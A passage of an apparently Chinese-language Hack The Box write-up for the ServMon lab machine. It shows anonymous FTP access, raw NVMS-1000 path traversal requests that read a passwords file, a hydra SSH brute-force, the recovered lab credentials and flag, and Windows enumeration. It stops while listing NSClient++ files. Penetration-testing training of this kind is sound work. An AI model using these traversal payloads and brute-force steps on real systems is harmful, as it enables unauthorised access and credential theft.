ServMon-htb-writeup

0x00 靶场技能介绍

章节技能：ftp匿名访问、NVMS CMS任意文件读取漏洞、hydra密码暴力破解、C盘敏感信息枚举、SSH本地端口转发、nscp.exe软件分析使用、NSClient++ 0.5.2.35- 经过身份验证的远程代码执行

参考链接：https://otrashoui.xyz/servmon/#privesc

0x01 用户权限获取

1、获取靶机IP地址：10.10.10.184

2、扫描下开放端口情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.10.184

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5666/tcp  open  nrpe
6063/tcp  open  x11
6699/tcp  open  napster
8443/tcp  open  https-alt
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
21,22,80,135,139,445,5666,6063,6699,8443,49664,49665,49666,49667,49668,49669,49670, 

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p21,22,80,135,139,445,5666,6063,6699,8443,49664,49665,49666,49667,49668,49669,49670 --min-rate=10000 -sC -sV 10.10.10.184
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-17 18:36 CST
Nmap scan report for 10.10.10.184
Host is up (0.35s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22  07:35PM       <DIR>          Users
22/tcp    open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
|   256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_  256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp    open  http
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5666/tcp  open  tcpwrapped
6063/tcp  open  x11?
6699/tcp  open  napster?
8443/tcp  open  ssl/https-alt
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-03-17T10:38:45
|_  start_date: N/A

3、从扫描结果上看，是可以ftp匿名访问的，这里登录进入查看下是否有啥敏感信息泄露

┌──(kali㉿offsec)-[~/Desktop]
└─$ ftp Anonymous@10.10.10.184             
Connected to 10.10.10.184.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49678|)
125 Data connection already open; Transfer starting.
02-28-22  07:35PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49680|)
125 Data connection already open; Transfer starting.
02-28-22  07:36PM       <DIR>          Nadine
02-28-22  07:37PM       <DIR>          Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49682|)
150 Opening ASCII mode data connection.
02-28-22  07:36PM                  168 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
229 Entering Extended Passive Mode (|||49684|)
125 Data connection already open; Transfer starting.
100% |******************************************************************|   168        0.50 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (0.50 KiB/s)
ftp> cd ../
250 CWD command successful.
ftp> cd Nathan
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49686|)
125 Data connection already open; Transfer starting.
02-28-22  07:36PM                  182 Notes to do.txt
226 Transfer complete.
ftp> get Notes\ to\ do.txt
local: Notes to do.txt remote: Notes to do.txt
229 Entering Extended Passive Mode (|||49688|)
125 Data connection already open; Transfer starting.
100% |******************************************************************|   182        0.42 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 4 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
182 bytes received in 00:00 (0.42 KiB/s)
ftp> exit
221 Goodbye.

4、查看下获取到的两个文本信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine


Nathan，
我把你的Passwords.txt文件留在了你的桌面上。请在您自己编辑后将其删除，并将其放回安全文件夹中。
当做
Nadine


┌──(kali㉿offsec)-[~/Desktop]
└─$ cat Notes\ to\ do.txt 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

1） 更改NVMS的密码-完成
2） 锁定NSClient访问-完成
3） 上传密码
4） 删除NVMS的公共访问权限
5） 将机密文件放在SharePoint中

5、从这里可以得到两个信息，1个是Nathan的桌面上有一个Passwords.txt信息，一个是机密文件需要放在SharePoint中

6、SMB服务枚举，没发现啥信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.10.184

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L 10.10.10.184 -N
session setup failed: NT_STATUS_ACCESS_DENIED

7、查看网站的首页信息

http://10.10.10.184/Pages/login.htm

8、搜索相关漏洞信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit NVMS     
----------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                               |  Path
----------------------------------------------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal                                              | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification             | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer Overflow                           | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal                                          | hardware/webapps/48311.py
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results


┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m 47774
  Exploit: NVMS 1000 - Directory Traversal
      URL: https://www.exploit-db.com/exploits/47774
     Path: /usr/share/exploitdb/exploits/hardware/webapps/47774.txt
    Codes: N/A
 Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /home/kali/Desktop/47774.txt


┌──(kali㉿offsec)-[~/Desktop]
└─$ cat 47774.txt        
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1 

9、这里可以看到这个系统存在任意文件读取的漏洞，我们尝试验证下是否存在

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.10.10.184/Pages/login.htm
Cookie: dataPort=6063; lang_type=0x0804%24zh-cn

HTTP/1.1 200 OK
Content-type: 
Content-Length: 92
Connection: close
AuthInfo: 

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

10、那就获取下用户首页的密码信息吧

GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.10.10.184/Pages/login.htm
Cookie: dataPort=6063; lang_type=0x0804%24zh-cn


HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo: 

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

11、这里我们构造下账号密码破解包，并使用hydra进行暴力破解尝试

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat Users.txt        
Nathan
Nadine
                                                                                                               
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat Passwords.txt 
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$


┌──(kali㉿offsec)-[~/Desktop]
└─$ hydra -L Users.txt -P Passwords.txt ssh://10.10.10.184
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-17 19:34:14
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-17 19:34:23

12、通过ssh登录，获取到第一个flag信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh Nadine@10.10.10.184     
The authenticity of host '10.10.10.184 (10.10.10.184)' can't be established.
ED25519 key fingerprint is SHA256:WctzSeuXs6dqa7LqHkfVZ38Pppc/KRlSmEvNtPlwSoQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.184' (ED25519) to the list of known hosts.
Nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 20C1-47A1

 Directory of C:\Users\Nadine\Desktop

02/28/2022  08:05 PM    <DIR>          .
02/28/2022  08:05 PM    <DIR>          ..
03/17/2024  03:29 AM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   6,110,035,968 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>cat user.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
8fb69451ba6ba88fe1b4ae19cce79afa        
                                        
nadine@SERVMON C:\Users\Nadine\Desktop> 

0x02 系统权限获取

13、开始内网的常规信息枚举

nadine@SERVMON C:\Users\Nadine\Desktop>
nadine@SERVMON C:\Users\Nadine\Desktop>
nadine@SERVMON C:\Users\Nadine\Desktop>ps -ano
'ps' is not recognized as an internal or external command,
operable program or batch file.

nadine@SERVMON C:\Users\Nadine\Desktop>clear
'clear' is not recognized as an internal or external command,
operable program or batch file.

nadine@SERVMON C:\Users\Nadine\Desktop>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Nadine\Desktop>
PS C:\Users\Nadine\Desktop> ps
 
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
     73       5     2720       4324              5944   1 cmd
     77       5     3508       4128       0.03   6756   0 cmd
    116       6     1148       4920       0.02   1624   0 conhost
    154       9     6640      12596              2420   0 conhost
    198      12     7152      18048              5952   1 conhost
    482      18     2288       5416               372   0 csrss
    325      13     2100       5120               484   1 csrss
    361      16     4964      16216              4220   1 ctfmon
    254      14     4016      13548              1088   0 dllhost
    582      26    23396      50800               968   1 dwm
   1413      54    20416      75172              4596   1 explorer
     49       6     1496       4536               752   0 fontdrvhost
     49       8     4092       9300               760   1 fontdrvhost
      0       0       56          8                 0   0 Idle
    909      23     5432      14520               628   0 lsass
    223      13     3040      10456              3288   0 msdtc
    783      85   258040     230376              2464   0 MsMpEng
    153      38     4612       7512              3848   0 NisSrv
    313      23     5820      18552               804   0 nscp
   2525     357   343916     373356              4936   1 NVMS-1000
    550      28    72896      81348       0.75   1588   0 powershell
      0      12      368      12224                88   0 Registry                                            
    294      15     6072      16912              3268   1 RuntimeBroker
    149       9     1800       7932              4088   1 RuntimeBroker
    225      12     2144      12024              5428   1 RuntimeBroker                                       
    673      33    21324      62864              4664   1 SearchUI
    529      11     4732       9464               620   0 services
    694      28    15120      51844              3972   1 ShellExperienceHost
    443      17     4900      24432               960   1 sihost
     53       3      500       1196               276   0 smss
    471      22     5892      16972              2172   0 spoolsv
    118      11     1668       6672              2324   0 sshd
    135       9     2256       7220       0.02   5404   0 sshd                                                
    128       9     2096       7324              6312   0 sshd
    149       9     1724      11860               360   0 svchost
    115       7     1320       5400               364   0 svchost
    213      12     2052       9828               488   0 svchost
     85       5      860       3780               732   0 svchost
    384      13    10712      14660               748   0 svchost
    827      20     6900      22640               776   0 svchost
    819      16     4756      11348               860   0 svchost
    243      10     1852       7112               904   0 svchost                                             
    143       7     1292       5688               956   0 svchost
    272      13     3396      10996              1008   0 svchost
    197      15     6284      10488              1052   0 svchost
    116      14     2840       6968              1192   0 svchost
    180      10     1920       8724              1208   0 svchost
    208       9     2036       7508              1256   0 svchost                                             
    184       9     1764       7608              1280   0 svchost
    341      13     3776      10664              1340   0 svchost
    226      13     2680       8076              1360   0 svchost
    378      18     4880      14188              1384   0 svchost
    236      12     2756      11516              1480   0 svchost
    307      10     2388       8420              1488   0 svchost
    426       9     2748       8936              1504   0 svchost
    152       7     1200       5640              1524   0 svchost
    261      13     2636       8000              1544   0 svchost
    163       9     1724       7916              1668   0 svchost
    315      11     2012       8872              1740   0 svchost
    185      11     2104      12004              1784   0 svchost
    141       9     1676       6660              1848   0 svchost
    233      11     2368       9644              1876   0 svchost
    399      32     8128      16524              1936   0 svchost
    194      11     1956       8184              1976   0 svchost
    167      12     1724       7336              2052   0 svchost
    180      22     2488       9900              2208   0 svchost
    325      16     4476      12100              2224   0 svchost
    393      16    10968      19940              2232   0 svchost
    206      11     2264       8416              2260   0 svchost
    136       8     1468       6228              2332   0 svchost
    128       8     1224       5472              2364   0 svchost
    209      12     1804       7492              2412   0 svchost
    169      10     2124      13272              2484   0 svchost
    465      16     3316      11832              2512   0 svchost
    324      18     4844      21512              3428   0 svchost
    271      13     3352      14616              3580   1 svchost
    201      11     2524      11548              3708   0 svchost
    365      18     5568      27328              3780   1 svchost
    171       9     1496       7304              4144   0 svchost
    166       9     4056      11844              4236   0 svchost
    249      14     3036      13788              4348   0 svchost
    329      16    13116      15380              6540   0 svchost
    114       7     1540       6036              6568   0 svchost
    170       9     2996       7768              6620   0 svchost
    274      20     7852      12748              6712   0 svchost
    168      11     2420      13268              6952   0 svchost
   1779       0      192        156                 4   0 System                                              
    196      12     3768       9388              2976   1 taskhostw
    178      11     2112      11040              3736   1 taskhostw
    156      49    17424      23284              6340   0 TiWorker
    136       8     1832       7020              2680   0 TrustedInstaller
    169      12     3220      10576              2384   0 VGAuthService
    132       8     1628       6600              1236   0 vm3dservice
    131       9     1688       7372              5864   1 vm3dservice
    388      22     9368      21368              2376   0 vmtoolsd
    259      18     5276      16864              5900   1 vmtoolsd                                            
    134      10     1532       7028              3980   1 WatchDog
    171      11     1460       6836               476   0 wininit
    281      12     2780      13120               540   1 winlogon
    340      15     7260      15864              3176   0 WmiPrvSE


PS C:\Users\Nadine\Desktop>  


PS C:\Users\Nadine\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS C:\Users\Nadine\Desktop>  

PS C:\Users\Nadine\Desktop> systeminfo
ERROR: Access denied
PS C:\Users\Nadine\Desktop> systeminfo
ERROR: Access denied
PS C:\Users\Nadine\Desktop>  

PS C:\Users\Nadine\Desktop> whoami 
servmon\nadine
PS C:\Users\Nadine\Desktop> hostname
ServMon
PS C:\Users\Nadine\Desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::248
   IPv6 Address. . . . . . . . . . . : dead:beef::80cc:f626:a006:68c
   Link-local IPv6 Address . . . . . : fe80::80cc:f626:a006:68c%6
   IPv4 Address. . . . . . . . . . . : 10.10.10.184
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d291%6
                                       10.10.10.2
PS C:\Users\Nadine\Desktop>


PS C:\Users\Nadine\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes

====================================== ================ ============ ==========================================
========
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                   Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192

PS C:\Users\Nadine\Desktop>


PS C:\Users\Nadine\Desktop> Get-LocalGroup

Name                                Description
----                                -----------
Access Control Assistance Operators Members of this group can remotely query authorization attributes and p... 
Administrators                      Administrators have complete and unrestricted access to the computer/do... 
Backup Operators                    Backup Operators can override security restrictions for the sole purpos... 
Certificate Service DCOM Access     Members of this group are allowed to connect to Certification Authoriti... 
Cryptographic Operators             Members are authorized to perform cryptographic operations.
Device Owners                       Members of this group can change system-wide settings.
Distributed COM Users               Members are allowed to launch, activate and use Distributed COM objects... 
Event Log Readers                   Members of this group can read event logs from local machine
Guests                              Guests have the same access as members of the Users group by default, e... 
Hyper-V Administrators              Members of this group have complete and unrestricted access to all feat... 
IIS_IUSRS                           Built-in group used by Internet Information Services.
Network Configuration Operators     Members in this group can have some administrative privileges to manage... 
Performance Log Users               Members of this group may schedule logging of performance counters, ena... 
Performance Monitor Users           Members of this group can access performance counter data locally and r... 
Power Users                         Power Users are included for backwards compatibility and possess limite... 
Print Operators                     Members can administer printers installed on domain controllers
RDS Endpoint Servers                Servers in this group run virtual machines and host sessions where user... 
RDS Management Servers              Servers in this group can perform routine administrative actions on ser... 
RDS Remote Access Servers           Servers in this group enable users of RemoteApp programs and personal v... 
Remote Desktop Users                Members in this group are granted the right to logon remotely
Remote Management Users             Members of this group can access WMI resources over management protocol... 
Replicator                          Supports file replication in a domain
Storage Replica Administrators      Members of this group have complete and unrestricted access to all feat... 
System Managed Accounts Group       Members of this group are managed by the system.
Users                               Users are prevented from making accidental or intentional system-wide c... 


PS C:\Users\Nadine\Desktop>


PS C:\Users\Nadine\Desktop> Get-LocalUser

Name               Enabled Description
----               ------- -----------
Administrator      True    Built-in account for administering the computer/domain
DefaultAccount     False   A user account managed by the system.
Guest              False   Built-in account for guest access to the computer/domain
Nadine             True
Nathan             True
WDAGUtilityAccount False   A user account managed and used by the system for Windows Defender Application G... 


PS C:\Users\Nadine\Desktop>



PS C:\Users\Nadine\Desktop> netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       2224
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       2324 
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4936
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       860
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5666           0.0.0.0:0              LISTENING       804
  TCP    0.0.0.0:5666           0.0.0.0:0              LISTENING       804 
  TCP    0.0.0.0:6063           0.0.0.0:0              LISTENING       4936
  TCP    0.0.0.0:6699           0.0.0.0:0              LISTENING       4936
  TCP    0.0.0.0:8443           0.0.0.0:0              LISTENING       804
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       476 
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       748
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1384
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2172 
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       620
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       2052
  TCP    0.0.0.0:49670          0.0.0.0:0              LISTENING       628 
  TCP    10.10.10.184:22        10.10.14.11:55902      ESTABLISHED     2324
  TCP    10.10.10.184:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.10.184:6699      10.10.14.11:34224      CLOSE_WAIT      4936 
  TCP    10.10.10.184:6699      10.10.14.11:34586      CLOSE_WAIT      4936
  TCP    10.10.10.184:6699      10.10.14.11:37008      CLOSE_WAIT      4936
  TCP    10.10.10.184:6699      10.10.14.11:40054      CLOSE_WAIT      4936 
  TCP    10.10.10.184:6699      10.10.14.11:40070      CLOSE_WAIT      4936
  TCP    10.10.10.184:6699      10.10.14.11:58846      CLOSE_WAIT      4936
  TCP    127.0.0.1:49673        127.0.0.1:49674        ESTABLISHED     4936 
  TCP    127.0.0.1:49674        127.0.0.1:49673        ESTABLISHED     4936
  TCP    127.0.0.1:49675        127.0.0.1:49676        ESTABLISHED     4936
  TCP    127.0.0.1:49676        127.0.0.1:49675        ESTABLISHED     4936 
  TCP    [::]:21                [::]:0                 LISTENING       2224
  TCP    [::]:22                [::]:0                 LISTENING       2324
  TCP    [::]:135               [::]:0                 LISTENING       860 
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:5666              [::]:0                 LISTENING       804
  TCP    [::]:49664             [::]:0                 LISTENING       476 
  TCP    [::]:49665             [::]:0                 LISTENING       748
  TCP    [::]:49666             [::]:0                 LISTENING       1384
  TCP    [::]:49667             [::]:0                 LISTENING       2172
  TCP    [::]:49668             [::]:0                 LISTENING       620
  TCP    [::]:49669             [::]:0                 LISTENING       2052
  TCP    [::]:49670             [::]:0                 LISTENING       628
  UDP    0.0.0.0:123            *:*                                    2412
  UDP    0.0.0.0:500            *:*                                    1544
  UDP    0.0.0.0:4500           *:*                                    1544
  UDP    0.0.0.0:5353           *:*                                    1360
  UDP    0.0.0.0:5355           *:*                                    1360
  UDP    0.0.0.0:23456          *:*                                    4936
  UDP    0.0.0.0:23456          *:*                                    4936
  UDP    0.0.0.0:56431          *:*                                    4936
  UDP    0.0.0.0:57208          *:*                                    804
  UDP    10.10.10.184:137       *:*                                    4
  UDP    10.10.10.184:138       *:*                                    4
  UDP    127.0.0.1:56428        *:*                                    2512
  UDP    127.0.0.1:57207        *:*                                    804
  UDP    [::]:123               *:*                                    2412
  UDP    [::]:500               *:*                                    1544
  UDP    [::]:4500              *:*                                    1544
  UDP    [::]:5353              *:*                                    1360
  UDP    [::]:5355              *:*                                    1360
PS C:\Users\Nadine\Desktop>Get-ChildItem -Path C:\ -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue



    Directory: C:\Program Files\NSClient++


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/14/2020   1:24 PM             51 boot.ini
-a----        1/18/2018   3:51 PM         157453 changelog.txt
-a----        11/5/2017  10:04 PM          18351 license.txt                                                  
-a----        4/10/2020   6:32 PM           2683 nsclient.ini







PS C:\Users\Nadine\Desktop>

14、经过一系列的枚举，发现了和网站8443端口相似的目录文件

15、这里查看 NSClient++ 文件信息

PS C:\Users\Nadine\Desktop> cd C:\"Program Files"\
PS C:\Program Files> dir


    Directory: C:\Program Files
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         3/1/2022   1:20 AM                Common Files
d-----       11/11/2019   6:52 PM                internet explorer
d-----        2/28/2022   6:07 PM                MSBuild
d-----        2/28/2022   6:55 PM                NSClient++
d-----        2/28/2022   6:46 PM                NVMS-1000
d-----        2/28/2022   6:32 PM                OpenSSH-Win64
d-----        2/28/2022   6:07 PM                Reference Assemblies
d-----        2/28/2022   5:44 PM                VMware
d-r---       11/11/2019   6:52 PM                Windows Defender
d-----       11/11/2019   6:52 PM                Windows Defender Advanced Threat Protection
d-----        9/15/2018  12:19 AM                Windows Mail
d-----       11/11/2019   6:52 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----       11/11/2019   6:52 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                Windows Security
d-----        2/28/2022   6:25 PM                WindowsPowerShell


PS C:\Program Files> cd NSClient++
PS C:\Program Files\NSClient++>
PS C:\Program Files\NSClient++> dir


    Directory: C:\Program Files\NSClient++


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        3/17/2024   4:27 AM                crash-dumps
d-----        2/28/2022   6:55 PM                modules
d-----        2/28/2022   6:55 PM                scripts
d-----        2/28/2022   6:55 PM                security
d-----        2/28/2022   6:55 PM                web
-a----        12/9/2015  12:17 AM          28672 boost_chrono-vc110-mt-1_58.dll
-a----        12/9/2015  12:17 AM          50688 boost_date_time-vc110-mt-1_58.dll
-a----        12/9/2015  12:17 AM         117760 boost_filesystem-vc110-mt-1_58.dll
-a----        12/9/2015  12:22 AM         439296 boost_program_options-vc110-mt-1_58.dll
-a----        12/9/2015  12:23 AM         256000 boost_python-vc110-mt-1_58.dll
-a----        12/9/2015  12:17 AM         765952 boost_regex-vc110-mt-1_58.dll
-a----        12/9/2015  12:16 AM          19456 boost_system-vc110-mt-1_58.dll
-a----        12/9/2015  12:18 AM         102400 boost_thread-vc110-mt-1_58.dll
-a----        1/14/2020   1:24 PM             51 boot.ini
-a----        1/18/2018   3:51 PM         157453 changelog.txt
-a----        1/28/2018  10:33 PM        1210392 check_nrpe.exe
-a----        12/8/2015  11:16 PM        1655808 libeay32.dll
